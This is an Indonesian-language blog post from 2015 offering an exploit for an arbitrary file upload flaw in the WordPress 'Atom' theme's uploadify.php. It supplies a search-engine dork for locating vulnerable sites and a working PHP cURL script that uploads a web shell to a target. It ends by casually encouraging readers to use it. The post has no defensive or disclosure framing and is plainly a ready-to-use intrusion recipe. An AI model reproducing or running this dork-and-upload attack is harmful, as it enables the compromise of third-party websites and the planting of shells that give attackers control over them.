Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Minggu, 28 Juni 2015

WP Atom Thames Arbitary File Upload

Langsung   XAMPP siapin

  • Dork : inurl:"/wp-content/themes/atom/"
  • Exploit: /wp-content/themes/atom/uploadify/uploadify.php
script php:

$uploadfile="nama_shell_mu.php";

$ch = curl_init("www.target.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

**bisa kan pakenya :*

Tidak ada komentar:

Posting Komentar